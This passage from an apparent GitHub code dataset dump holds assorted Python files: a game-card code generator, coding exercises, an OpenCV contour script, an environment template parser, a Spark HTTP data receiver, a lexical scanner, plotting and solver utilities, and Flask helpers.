Add wire protocol\n# documentation.\n\n# TODO: investigate if superq class should support __add__, __iadd__\n","repo_name":"manesajian/superq","sub_path":"superq.py","file_name":"superq.py","file_ext":"py","file_size_in_byte":95506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71799711400","text":"import ujson as json\n\n\ndef build_class_name(name, id):\n name0 = name.replace(\"'\", \"\").replace(\":\", \" \").replace(\"!\", \" \").replace(\",\", \" \").replace(\"-\", \" \")\n name1 = \"\".join([x.capitalize() for x in name0.split(' ')])\n return name1 + \"{0:#0{1}d}\".format(id, 4)\n\n\ndata1 = json.load(open(\"set1-en_us.json\"))\ndata2 = json.load(open(\"set2-en_us.json\"))\ndata = data1 + data2\ncode2id = dict()\nid2classname = dict()\nfor id, item in enumerate(data):\n code2id[item['cardCode']] = id\n id2classname[id] = build_class_name(item['name'], id)\n\n# generate gallery.cc\ngallery_cc = ['''#include \"gallery.h\"\n#include \"initiator.h\"\n#include \"cardset01.cc\"\n#include \"cardset02.cc\"\n''']\nporo_with_1_cost = []\nchampion = dict()\nfor id, item in enumerate(data):\n if item['type'] == 'Unit' and item['supertype'] == 'Champion':\n champion[id] = -1\n if item['subtype'] == 'PORO' and item['cost'] == 1 and item['collectible']:\n poro_with_1_cost.append(id)\nfor id, item in enumerate(data):\n if item['type'] == 'Spell' and item['supertype'] == 'Champion':\n ref = item['associatedCardRefs']\n for code in ref:\n if code2id[code] in champion:\n champion[code2id[code]] = id\ncsp = []\nfor ch in champion:\n csp.append(\"{\" + \"{},{}\".format(ch, champion[ch]) + \"}\")\ngallery_cc.append(\"umap GALLERY;\")\ngallery_cc.append(\"umap COLLECTIBLE;\")\ngallery_cc.append(\"vec DRAVEN = {1, 130};\\n\")\ngallery_cc.append(\"vec PORO_WITH_1_COST = {\" + \",\".join(map(lambda x: str(x), poro_with_1_cost)) + \"};\\n\")\ngallery_cc.append(\"umap CHAMPION_TO_SPELL = {\" + \",\".join(csp) + \"};\")\ngallery_cc.append('''\n\nvoid init_gallery() {\n init_cardset01();\n init_cardset02();\n for (auto p: GALLERY) {\n if (p.second->collectible)\n COLLECTIBLE[p.first] = p.second;\n CODE_TO_CARD[str(p.second->code)] = p.second;\n }\n init01IO049();\n init01SI030();\n init01SI030T2();\n init01NX050();\n}\n\nvoid clear_gallery() {\n for(auto entry: GALLERY){\n delete entry.second;\n }\n GALLERY.clear();\n}\n''')\n\ngf = open(\"../src/cardset/gallery.cc\", 'w')\ngf.writelines(gallery_cc)\n","repo_name":"hengruo/RuneSim","sub_path":"legacy/meta/gen_gallery.py","file_name":"gen_gallery.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"41399103040","text":"# Raise a number entered from the keyboard to the power n, \n# the power is also entered from the keyboard. 
\n# Implement the exponentiation using loops.\n\nnumber = int(input('Enter number: '))\npower = int(input('Enter power: '))\n\nresult = 1\n\nfor i in range(power):\n result *= number\nprint(result)\n","repo_name":"jonnytaddesky/taskPython","sub_path":"pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"15719593625","text":"# ...Back to Python for now, in the interest of time and my fragile ego\n\nfrom collections import defaultdict\n\nconnections = defaultdict(list) # A dict of lists, mapping each cave to its neighbors\nwith open('input.txt') as input_file:\n for line in input_file:\n first, second = line.rstrip().split('-')\n connections[first].append(second)\n connections[second].append(first)\n\n# Start at 'start' and perform a depth-first-search to find all the valid paths to 'end'\ndef spelunk(current_path: list):\n \"\"\"Return the number of valid complete paths that are found by extending the given path.\"\"\"\n global connections\n\n if current_path[-1] == 'end':\n return 1\n\n count = 0\n for cave in connections[current_path[-1]]:\n if cave == 'start' or cave.islower() and cave in current_path:\n continue\n count += spelunk(current_path + [cave])\n return count\n\nprint(spelunk(['start']))\n","repo_name":"brianfay/aoc-2021","sub_path":"sean/12/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21713161106","text":"# Find contours -> turn each contour into a circle or ellipse\n\nimport cv2\nimport numpy as np\n\n# Threshold values for Canny edge detection.\nlower = 84\nupper = 200\n\n# Load the test image as img1, copy it to img2, and convert img to grayscale.\nimg1 = cv2.imread('det.jpg', 1)\nimg2 = img1.copy()\nimg = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n\n# Apply Gaussian blur.\nimg = cv2.GaussianBlur(img,(5, 5),0)\n\n# Use cv2.Canny for edge detection. (input image, min value, max value)\nedges = cv2.Canny(img, lower, upper)\n\n# Draw the found contours on the image.\ntry:\n _, contours , _= cv2.findContours(edges, cv2.RETR_TREE, 1)\nexcept:\n contours, _ = cv2.findContours(edges, cv2.RETR_TREE, 1)\n\nrep = cv2.drawContours(img1, contours, -1, (0,255,0), 3)\n\n# Convert each contour into a circular shape. 
(circle or ellipse)\nfor i in range(0, len(contours)):\n ellipse = cv2.fitEllipse(contours[i])\n (center, axes, orientation) = ellipse\n majoraxis_length = max(axes)\n minoraxis_length = min(axes)\n eccentricity=(np.sqrt(1-(minoraxis_length / majoraxis_length)**2))\n cv2.ellipse(img2,ellipse,(0,0,255),2)\n\n# The detected edges.\ncv2.imshow('Edges', edges )\n# The drawn contours.\ncv2.imshow('contours',rep)\n# The fitted ellipses.\ncv2.imshow('Detected ellipse', img2)\n\ncv2.waitKey(0)","repo_name":"lyj911111/OpenCV_Project","sub_path":"_testcodes/외곽선을 타원형 또는 원형으로 만들어줌/Contour_TO_circleOrElipse.py","file_name":"Contour_TO_circleOrElipse.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22767237678","text":"# Very simple environment template parser\n# Only substitutes named variables using a predetermined set of known values from env.json\nimport glob\nimport json\nimport re\nimport sys\nfrom os.path import basename\nfrom os import getenv\n\nvar_pattern = re.compile('{{([^}]+)}}')\nname_pattern = re.compile('[a-z]+[-_a-z0-9]+', re.IGNORECASE)\n\ndef parse(content, data, debug=False): \n r = var_pattern.findall(content)\n for name in r:\n if not name_pattern.match(name):\n raise Exception(\"Variable '%s' is not a good variable name\" % (name))\n if not name in data:\n raise Exception(\"Variable '%s' is not known\" % (name))\n value = data[name]\n var = '{{' + name + '}}'\n if debug:\n print(\"%s : '%s' %s\" % (name, content, value,))\n content = content.replace(var, value)\n if debug:\n print(\" => \"+ content+ \"\\n\")\n \n return content\n\ndef update_template(file, data):\n with open(file, 'r') as f:\n content = f.read()\n f.close()\n try:\n content = parse(content, data)\n except Exception as e:\n print(\"Error in %s %s\" % (file, e))\n return content \n\ndef update_data(data):\n \"\"\"\n Update data to find variables inside\n \"\"\"\n to_update = [] # Find entries needed to be updated\n for name, value in data.items():\n if var_pattern.search(value):\n to_update.append(name)\n for name in to_update:\n data[name] = parse(data[name], data)\n return data \n\ntarget_dir = 'env'\n\nif getenv('ENV_DIR'):\n target_dir = getenv('ENV_DIR')\n\nif len(sys.argv) > 1:\n target_dir = sys.argv[1]\n\nwith open(target_dir + '/env.json','r') as fp:\n data = json.load(fp)\n fp.close()\n\n# Can use {{ENV_DIR}} to relate to current environment dir\ndata['ENV_DIR'] = target_dir\n\ndata = update_data(data)\n\nwith open(target_dir + '/env.build.json', 'w') as fp:\n json.dump(data, fp)\n fp.close()\n\nprint(\"Building env from %s\" % (target_dir))\ncount = 0\nfor file in glob.glob('templates/*.tpl'):\n target = target_dir+ '/' + basename(file)\n target = target.replace('.tpl', '.env')\n content = update_template(file, data)\n with open(target, 'w+') as f:\n f.write(content)\n f.close()\n count += 1\nprint(\"%d files generated\" % (count, ))","repo_name":"grippenet/cluster-compose-tools","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41495321740","text":"import json\nimport math\nfrom typing import Any, Dict, List, Optional, cast\n\nfrom more_itertools import chunked\nfrom pyspark import StorageLevel\nfrom pyspark.sql.types import Row\nfrom pyspark.rdd import RDD\nfrom pyspark.sql.functions import col, from_json\nfrom pyspark.sql.types import (\n StructField,\n StringType,\n StructType,\n MapType,\n 
IntegerType,\n BooleanType,\n)\n\nfrom spark_pipeline_framework.transformers.http_data_receiver.v4.http_data_receiver_processor import (\n HttpDataReceiverProcessor,\n RESPONSE_PROCESSOR_TYPE,\n REQUEST_GENERATOR_TYPE,\n)\nfrom spark_pipeline_framework.utilities.capture_parameters import capture_parameters\nfrom pyspark.ml.param import Param\nfrom pyspark.sql.dataframe import DataFrame\nfrom spark_pipeline_framework.logger.yarn_logger import get_logger\nfrom spark_pipeline_framework.progress_logger.progress_log_metric import (\n ProgressLogMetric,\n)\nfrom spark_pipeline_framework.progress_logger.progress_logger import ProgressLogger\nfrom spark_pipeline_framework.transformers.framework_transformer.v1.framework_transformer import (\n FrameworkTransformer,\n)\nfrom spark_pipeline_framework.utilities.oauth2_helpers.v2.oauth2_client_credentials_flow import (\n OAuth2Credentails,\n)\nfrom spark_pipeline_framework.utilities.spark_data_frame_helpers import (\n create_empty_dataframe,\n)\n\n\nclass HttpDataReceiver(FrameworkTransformer):\n \"\"\"\n This is a generic class to call a http api and return the response\n \"\"\"\n\n # noinspection PyUnusedLocal\n @capture_parameters\n def __init__(\n self,\n name: str,\n success_view: str,\n error_view: str,\n http_request_generator: REQUEST_GENERATOR_TYPE,\n response_processor: RESPONSE_PROCESSOR_TYPE,\n success_schema: Optional[StructType] = None,\n error_schema: Optional[StructType] = None,\n num_partition: Optional[int] = None,\n batch_size: int = 1000,\n items_per_partition: Optional[int] = None,\n cache_storage_level: Optional[StorageLevel] = None,\n credentials: Optional[OAuth2Credentails] = None,\n auth_url: Optional[str] = None,\n parameters: Optional[Dict[str, Any]] = None,\n run_sync: bool = False,\n raise_error: bool = False,\n progress_logger: Optional[ProgressLogger] = None,\n ) -> None:\n \"\"\"\n Transformer to call and receive data from an API\n\n :param name: name of transformer\n :param success_view: name of the view to read the response into\n :param error_view: (Optional) log the details of the api failure into `error_view` view.\n :param http_request_generator: Generator to build next http request\n :param response_processor: it can change the result before loading to spark df\n :param success_schema: Schema for success response\n :param error_schema: Schema for error response\n :param num_partition: Number of batches\n :param batch_size: Size of a partition, used in internal processing like converting requests to view\n :param items_per_partition: Number of items to process per partition\n :param cache_storage_level: (Optional) how to store the cache:\n https://sparkbyexamples.com/spark/spark-dataframe-cache-and-persist-explained/.\n :param credentials: OAuth2 credentails\n :param auth_url: OAuth2 token URL\n :param parameters: parameters\n :param run_sync: process the items linearly\n :param raise_error: (Optional) Raise error in case of api failure\n :param progress_logger: progress logger\n \"\"\"\n super().__init__(\n name=name, parameters=parameters, progress_logger=progress_logger\n )\n\n self.logger = get_logger(__name__)\n\n self.name: Param[str] = Param(self, \"name\", \"\")\n self._setDefault(name=None)\n\n self.success_view: Param[str] = Param(self, \"success_view\", \"\")\n self._setDefault(success_view=None)\n\n self.error_view: Param[str] = Param(self, \"error_view\", \"\")\n self._setDefault(error_view=None)\n\n self.http_request_generator: Param[REQUEST_GENERATOR_TYPE] = Param(\n self, \"http_request_generator\", 
\"\"\n )\n self._setDefault(http_request_generator=None)\n\n self.response_processor: Param[RESPONSE_PROCESSOR_TYPE] = Param(\n self, \"response_processor\", \"\"\n )\n self._setDefault(response_processor=None)\n\n self.success_schema: Param[Optional[StructType]] = Param(\n self, \"success_schema\", \"\"\n )\n self._setDefault(success_schema=success_schema)\n\n self.error_schema: Param[Optional[StructType]] = Param(self, \"error_schema\", \"\")\n self._setDefault(error_schema=error_schema)\n\n self.num_partition: Param[Optional[int]] = Param(self, \"num_partition\", \"\")\n self._setDefault(num_partition=None)\n\n self.batch_size: Param[int] = Param(self, \"batch_size\", \"\")\n self._setDefault(batch_size=batch_size)\n\n self.items_per_partition: Param[Optional[int]] = Param(\n self, \"items_per_partition\", \"\"\n )\n self._setDefault(items_per_partition=None)\n\n self.cache_storage_level: Param[Optional[StorageLevel]] = Param(\n self, \"cache_storage_level\", \"\"\n )\n self._setDefault(cache_storage_level=None)\n\n self.credentials: Param[Optional[OAuth2Credentails]] = Param(\n self, \"credentials\", \"\"\n )\n self._setDefault(credentials=None)\n\n self.auth_url: Param[Optional[str]] = Param(self, \"auth_url\", \"\")\n self._setDefault(auth_url=None)\n\n self.run_sync: Param[bool] = Param(self, \"run_sync\", \"\")\n self._setDefault(run_sync=run_sync)\n\n self.raise_error: Param[bool] = Param(self, \"raise_error\", \"\")\n self._setDefault(raise_error=raise_error)\n\n kwargs = self._input_kwargs\n self.setParams(**kwargs)\n\n def _transform(self, df: DataFrame) -> DataFrame:\n # Setting the variables\n name: str = self.getOrDefault(self.name)\n success_view: str = self.getOrDefault(self.success_view)\n error_view: str = self.getOrDefault(self.error_view)\n success_schema: Optional[StructType] = self.getOrDefault(self.success_schema)\n error_schema: Optional[StructType] = self.getOrDefault(self.error_schema)\n num_partition: Optional[int] = self.getOrDefault(self.num_partition)\n batch_size: int = self.getOrDefault(self.batch_size)\n items_per_partition: Optional[int] = self.getOrDefault(self.items_per_partition)\n http_request_generator: REQUEST_GENERATOR_TYPE = self.getOrDefault(\n self.http_request_generator\n )\n response_processor: RESPONSE_PROCESSOR_TYPE = self.getOrDefault(\n self.response_processor\n )\n cache_storage_level: Optional[StorageLevel] = self.getOrDefault(\n self.cache_storage_level\n )\n credentials: Optional[OAuth2Credentails] = self.getOrDefault(self.credentials)\n auth_url: Optional[str] = self.getOrDefault(self.auth_url)\n run_sync: bool = self.getOrDefault(self.run_sync)\n raise_error: bool = self.getOrDefault(self.raise_error)\n progress_logger: Optional[ProgressLogger] = self.getProgressLogger()\n\n with ProgressLogMetric(\n name=f\"{name}_http_data_receiver_v4\", progress_logger=progress_logger\n ):\n requests_df: DataFrame = create_empty_dataframe(\n df.sparkSession,\n StructType(\n [\n StructField(\"url\", StringType()),\n StructField(\"headers\", StringType()),\n StructField(\"state\", StringType()),\n ]\n ),\n )\n for requests in chunked(\n http_request_generator(df, progress_logger), batch_size\n ):\n # Create the Dataframe\n view_data = [\n [\n request.url,\n json.dumps(request.headers),\n json.dumps(extra_context),\n ]\n for request, extra_context in requests\n ]\n df_ = df.sparkSession.createDataFrame(\n view_data, [\"url\", \"headers\", \"state\"]\n )\n\n # Append the Dataframe\n requests_df = requests_df.union(df_)\n 
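# Register the combined request batches as a temp view for downstream steps\n 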
requests_df.createOrReplaceTempView(\"requests_view\")\n\n desired_partitions: int = self.get_desired_partitions(\n num_partition=num_partition,\n items_per_partition=items_per_partition,\n df=requests_df,\n )\n\n row_schema = StructType(\n [\n StructField(\"headers\", MapType(StringType(), StringType())),\n StructField(\"url\", StringType()),\n StructField(\"status\", IntegerType()),\n StructField(\"is_error\", BooleanType()),\n StructField(\"error_data\", StringType()),\n StructField(\"success_data\", StringType()),\n StructField(\"state\", StringType()),\n ]\n )\n\n if run_sync:\n rows: List[Row] = requests_df.collect()\n result_rows = HttpDataReceiverProcessor.process_rows(\n partition_index=0,\n rows=rows,\n response_processor=response_processor,\n raise_error=raise_error,\n credentials=credentials,\n auth_url=auth_url,\n )\n\n # Create success view\n success = filter(lambda row: not row[\"is_error\"], result_rows)\n df_success: DataFrame = df.sparkSession.createDataFrame(\n [s.asDict(recursive=True) for s in success], schema=row_schema\n )\n json_schema = self.infer_schema_json_string_column(\n df_success, \"success_data\"\n )\n self.copy_and_drop_column(\n df_success, \"success_data\", \"data\", success_view, json_schema\n )\n\n # Create error view\n error = filter(lambda row: row[\"is_error\"], result_rows)\n df_errors: DataFrame = df.sparkSession.createDataFrame(\n [e.asDict(recursive=True) for e in error], schema=row_schema\n )\n json_schema = self.infer_schema_json_string_column(\n df_errors, \"error_data\"\n )\n self.copy_and_drop_column(\n df_errors, \"error_data\", \"data\", error_view, json_schema\n )\n else:\n rdd: RDD[Row] = requests_df.repartition(\n desired_partitions\n ).rdd.mapPartitionsWithIndex(\n lambda partition_index, rows_to_query: HttpDataReceiverProcessor.process_rows(\n partition_index=partition_index,\n rows=rows_to_query,\n response_processor=response_processor,\n raise_error=raise_error,\n credentials=credentials,\n auth_url=auth_url,\n )\n )\n rdd = (\n rdd.cache()\n if cache_storage_level is None\n else rdd.persist(storageLevel=cache_storage_level)\n )\n\n result_df: DataFrame = rdd.toDF(schema=row_schema)\n\n # Create success view\n df_success = result_df.filter(result_df[\"is_error\"] == False)\n json_schema = success_schema or self.infer_schema_json_string_column(\n df_success, \"success_data\"\n )\n self.copy_and_drop_column(\n df_success, \"success_data\", \"data\", success_view, json_schema\n )\n\n # Create error view\n df_errors = result_df.filter(result_df[\"is_error\"] == True)\n json_schema = error_schema or self.infer_schema_json_string_column(\n df_errors, \"error_data\"\n )\n self.copy_and_drop_column(\n df_errors, \"error_data\", \"data\", error_view, json_schema\n )\n\n return df\n\n def infer_schema_json_string_column(self, df: DataFrame, col_: str) -> StructType:\n \"\"\"\n Infer json schema from `col_` column\n\n :param df: Dataframe to be processed.\n :param col_: Source column name\n \"\"\"\n json_schema = df.sparkSession.read.json(\n df.rdd.map(lambda row: cast(str, row[col_]))\n ).schema\n return json_schema\n\n def copy_and_drop_column(\n self, df: DataFrame, col_: str, dest_col: str, view: str, schema: StructType\n ) -> None:\n \"\"\"\n Copy the `col_` column to `dest_col` column with provided schema\n\n :param df: Dataframe to be processed.\n :param col_: source column\n :param dest_col: destination column\n :param view: Name of the view where the dataframe will be saved\n :param schema: schema of the `dest_col` column\n \"\"\"\n 
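# Parse the JSON string column into a typed struct before publishing the view\n 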
df = df.withColumn(dest_col, from_json(col(col_), schema))\n df = df.drop(\"success_data\", \"error_data\", \"is_error\")\n df.createOrReplaceTempView(view)\n\n def get_desired_partitions(\n self,\n *,\n df: DataFrame,\n num_partition: Optional[int] = None,\n items_per_partition: Optional[int] = None,\n ) -> int:\n \"\"\"\n Get the desired partitions based on num_partition, items_per_partition and dataframe\n\n :param num_partition: number of desired partitions\n :param items_per_partition: number of items in a partitions\n :param df: Dataframe which will be divided into partitions\n \"\"\"\n desired_partitions: int\n if num_partition:\n desired_partitions = num_partition\n else:\n row_count: int = df.count()\n desired_partitions = (\n math.ceil(row_count / items_per_partition)\n if items_per_partition and items_per_partition > 0\n else row_count\n ) or 1\n self.logger.info(f\"Total Batches: {desired_partitions}\")\n return desired_partitions\n","repo_name":"icanbwell/SparkPipelineFramework","sub_path":"spark_pipeline_framework/transformers/http_data_receiver/v4/http_data_receiver.py","file_name":"http_data_receiver.py","file_ext":"py","file_size_in_byte":14581,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"70757430439","text":"import SymbolTable\nimport Symbols\nimport re\n\n\nclass Scanner:\n def __init__(self):\n self.__operators = []\n self.__separators = []\n self.__reserved_words = []\n self.PIF = []\n self.ST = SymbolTable.SymbolTable(13)\n self.symbols = Symbols.Symbols()\n\n def check_if_identifier(self, token):\n return re.search('^[a-z]([a-zA-Z])*$', token) is not None\n\n def is_constant(self, token):\n return re.search('^(0|[+-]?[1-9][0-9]*)$|^\\'.\\'$|^\\'.*\\'$', token) is not None\n\n def get_string_token_from_line(self, line, index):\n token = ''\n quotes = 0\n while index < len(line) and quotes < 2:\n if line[index] == '\\'' or line[index] == '\\\"':\n quotes += 1\n token += line[index]\n index += 1\n return token, index\n\n def is_operator(self, c):\n for operator in self.symbols.operators:\n if c in operator:\n return True\n return False\n\n def get_operator_from_token(self, line, index):\n token = ''\n while index < len(line) and self.is_operator(line[index]):\n token += line[index]\n index += 1\n return token, index\n\n def get_tokens(self, line):\n token = ''\n tokens = []\n i = 0\n while i < len(line):\n if self.is_operator(line[i]):\n if token:\n tokens.append(token)\n token, i = self.get_operator_from_token(line, i)\n tokens.append(token)\n token = ''\n elif line[i] == '\\'' or line[i] == '\\\"':\n if token:\n tokens.append(token)\n token, i = self.get_string_token_from_line(line, i)\n tokens.append(token)\n token = ''\n elif line[i] in self.symbols.separators or line[i] == ' ':\n if token:\n tokens.append(token)\n token = line[i]\n i += 1\n tokens.append(token)\n token = ''\n else:\n token += line[i]\n i += 1\n if token:\n tokens.append(token)\n return tokens\n\n def read_from_file(self, file):\n f = open(file, \"r\")\n error = \"\"\n line_counter = 0\n for line in f:\n line_counter += 1\n tokens = self.get_tokens(line.strip())\n # print(tokens)\n for i in range(len(tokens)):\n if tokens[i][0] == \"\\'\" and tokens[i][len(tokens[i]) - 1] == \"\\'\":\n self.PIF.append((\"string\", 0))\n elif tokens[i][0] == \"\\\"\" and tokens[i][len(tokens[i]) - 1] == \"\\\"\":\n self.PIF.append((\"string\", 0))\n elif tokens[i] in self.symbols.reserved_words + self.symbols.separators + self.symbols.operators or 
\\\n tokens[i] == ' ':\n if tokens[i] == ' ':\n continue\n self.PIF.append((tokens[i], 0))\n elif self.check_if_identifier(tokens[i]):\n id1 = self.ST.add(tokens[i])\n self.PIF.append((\"id\", id1))\n elif self.is_constant(tokens[i]):\n const = self.ST.add(str(tokens[i]))\n self.PIF.append((\"const\", const))\n else:\n error += 'Lexical error at line ' + str(line_counter) + \" -> \" + tokens[i] + \"\\n\"\n wpif = open(\"PIF.out\", \"a\")\n wpif.write(self.PIF_string())\n wst = open(\"ST.out\", \"a\")\n wst.write(str(self.ST))\n if error == '':\n print(\"The program is lexically correct!\")\n else:\n print(error)\n\n def PIF_string(self):\n s = \"\"\n for i in self.PIF:\n s += str(i[0]) + \" \" + str(i[1]) + '\\n'\n return s\n\n def print_symbols(self):\n print(\"SEPARATORS: \", self.symbols.separators)\n print(\"-----\")\n print(\"OPERATORS: \", self.symbols.operators)\n print(\"-----\")\n print(\"RESERVED WORDS: \", self.symbols.reserved_words)\n","repo_name":"917OctaviaSuceava/FLCD","sub_path":"lab3/Scanner.py","file_name":"Scanner.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70924732519","text":"# ----------------------------------------------------------------- #\n# #\n# Parity plot generation unit #\n# #\n# This unit generates a parity plot based on the known values #\n# in the training data, and the predicted values generated #\n# using the training data. #\n# #\n# Because this metric compares predictions versus a ground truth, #\n# it doesn't make sense to generate the plot when a predict #\n# workflow is being run (because in that case, we generally don't #\n# know the ground truth for the values being predicted). Hence, #\n# this unit does nothing if the workflow is in \"predict\" mode. 
#\n# ----------------------------------------------------------------- #\n\n\nimport matplotlib.pyplot as plt\n\nimport settings\n\nwith settings.context as context:\n # Train\n if settings.is_workflow_running_to_train:\n # Restore the data\n train_target = context.load(\"train_target\")\n train_predictions = context.load(\"train_predictions\")\n test_target = context.load(\"test_target\")\n test_predictions = context.load(\"test_predictions\")\n\n # Un-transform the data\n target_scaler = context.load(\"target_scaler\")\n train_target = target_scaler.inverse_transform(train_target)\n train_predictions = target_scaler.inverse_transform(train_predictions)\n test_target = target_scaler.inverse_transform(test_target)\n test_predictions = target_scaler.inverse_transform(test_predictions)\n\n # Plot the data\n plt.scatter(train_target, train_predictions, c=\"#203d78\", label=\"Training Set\")\n if settings.is_using_train_test_split:\n plt.scatter(test_target, test_predictions, c=\"#67ac5b\", label=\"Testing Set\")\n plt.xlabel(\"Actual Value\")\n plt.ylabel(\"Predicted Value\")\n\n # Scale the plot\n target_range = (min(min(train_target), min(test_target)),\n max(max(train_target), max(test_target)))\n predictions_range = (min(min(train_predictions), min(test_predictions)),\n max(max(train_predictions), max(test_predictions)))\n\n limits = (min(min(target_range), min(predictions_range)),\n max(max(target_range), max(predictions_range)))\n plt.xlim(limits[0], limits[1])\n plt.ylim(limits[0], limits[1])\n\n # Draw a parity line, as a guide to the eye\n plt.plot((limits[0], limits[1]), (limits[0], limits[1]), c=\"black\", linestyle=\"dotted\", label=\"Parity\")\n plt.legend()\n\n # Save the figure\n plt.tight_layout()\n plt.savefig(\"my_parity_plot.png\", dpi=600)\n\n # Predict\n else:\n # It might not make as much sense to draw a plot when predicting...\n pass\n","repo_name":"Exabyte-io/application-flavors","sub_path":"assets/python/ml/pyml:post_processing:parity_plot:matplotlib.pyi","file_name":"pyml:post_processing:parity_plot:matplotlib.pyi","file_ext":"pyi","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"35780868662","text":"# Gold 2\n\nimport sys\nfrom heapq import heappop, heappush\n\ninput = sys.stdin.readline\n\n\ndef typology_sort():\n result = []\n heap = [i for i in range(1, n + 1) if in_degree[i] == 0]\n\n while heap:\n node = heappop(heap)\n result.append(node)\n for next_node in graph[node]:\n in_degree[next_node] -= 1\n if in_degree[next_node] == 0:\n heappush(heap, next_node)\n\n return result\n\n\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\nin_degree = [0] * (n + 1)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n in_degree[b] += 1\n\nprint(*typology_sort())\n","repo_name":"what-the-study/what-the-algorithm","sub_path":"youngjoo/BOJ/Topological_Sort/1766_문제집.py","file_name":"1766_문제집.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40985321783","text":"from flask import (Response as ResponseBase, \n redirect\n )\nfrom flask.json import dumps\nfrom ..datastructures import NCObject\nimport typing as t\n\ndef JsonResponse(*wargs, **kwargs) -> ResponseBase: \n \"\"\"\n Returns the Jsonified object.\n\n For example::\n \n from navycut.http import JsonResponse\n class CustomView(MethodView):\n def get(self):\n return 
JsonResponse(message=\"Salve Mundi!\")\n \"\"\"\n if len(wargs) and isinstance(wargs[0], NCObject): \n return ResponseBase(dumps(wargs[0].to_dict()), mimetype='application/json')\n \n return ResponseBase(dumps(wargs[0]), mimetype='application/json') if len(wargs) else ResponseBase(dumps(kwargs), mimetype='application/json')\n\n\ndef HttpResponse(*wargs, **kwargs) -> t.Type[ResponseBase]:\n return ResponseBase(*wargs, **kwargs)\n\ndef HTTPRedirect(location:str, \n code:int, \n response:t.Optional[t.Type[ResponseBase]]=None\n ) -> t.Type[ResponseBase]:\n \"\"\"\n Redirect to the specified location.\n\n :param location:\n the location where you want to redirect.\n :param code:\n the web status code. Default if 302.\n\n example::\n\n from navycut.http import HTTPRedirect\n\n def home(req, res):\n return HTTPRedirect(\"/admin/login/\")\n \"\"\"\n return redirect(location, code, response)","repo_name":"FlaskAio/navycut","sub_path":"navycut/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"13458646005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 7 17:07:32 2020\n@author: Mingfen Wang\n\"\"\"\n\nimport numpy as np\n\ndef coordinate_descent_method(A, b, guess, N, TOR):\n A_T = A.T\n x = guess.copy()\n k = 1\n while k < N:\n save_x = x.copy()\n for i in range(len(x)):\n b_in_Ax = b - np.dot(A, x)\n foot = np.dot(b_in_Ax, A_T[i]) / np.dot(A_T[i], A_T[i])\n x[i] = x[i] + foot\n diff_x = x - save_x\n if np.dot(diff_x, diff_x) < TOR:\n break\n k = k + 1\n return x, k\n\nA = np.array([[1., -1., 0.],\\\n [-1., 2., 1.],\\\n [0., 1., 5.]])\nb = np.array([3., -3., 4.])\nguess = np.array([0., 0., 0.])\nx, k = coordinate_descent_method(A, b, guess, 300 * len(b), 1e-6)\nprint(\"x = {} in {} iterations.\".format(x.round(2), k))\n","repo_name":"meshonline/coordinate-descent-solver","sub_path":"coorddescent.py","file_name":"coorddescent.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23605968846","text":"\"\"\"Register with a decorator.\"\"\"\nfrom dataclasses import dataclass\n\nfrom hopscotch import injectable\nfrom hopscotch import Registry\n\n\n@injectable()\n@dataclass\nclass Greeter:\n \"\"\"A simple greeter.\"\"\"\n\n greeting: str = \"Hello!\"\n\n\nregistry = Registry()\nregistry.scan()\n# Later\ngreeter = registry.get(Greeter)\n# greeter.greeting == \"Hello!\"\n","repo_name":"pauleveritt/hopscotch","sub_path":"examples/readme/decorator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"24335184805","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom ...models_access import (\n OdooProductAccess, ProductSyncAccess, AmazonProductAccess\n)\nfrom ...model_names.shared_names import (\n MODEL_NAME_FIELD, RECORD_ID_FIELD,\n)\nfrom ...model_names.product_sync import (\n SYNC_TYPE_FIELD,\n SYNC_DELETE, SYNC_CREATE, SYNC_DEACTIVATE,\n)\nfrom ..amazon_names import AMAZON_ID_FIELD, AMAZON_SKU_FIELD\n\n_logger = logging.getLogger(__name__)\n\n\nclass BaseTransformer(object):\n \"\"\"\n This is the base transform\n \"\"\"\n def __init__(self, env):\n self._odoo_product = OdooProductAccess(env)\n self._product_sync = ProductSyncAccess(env)\n self._amazon_product = AmazonProductAccess(env)\n self._product = 
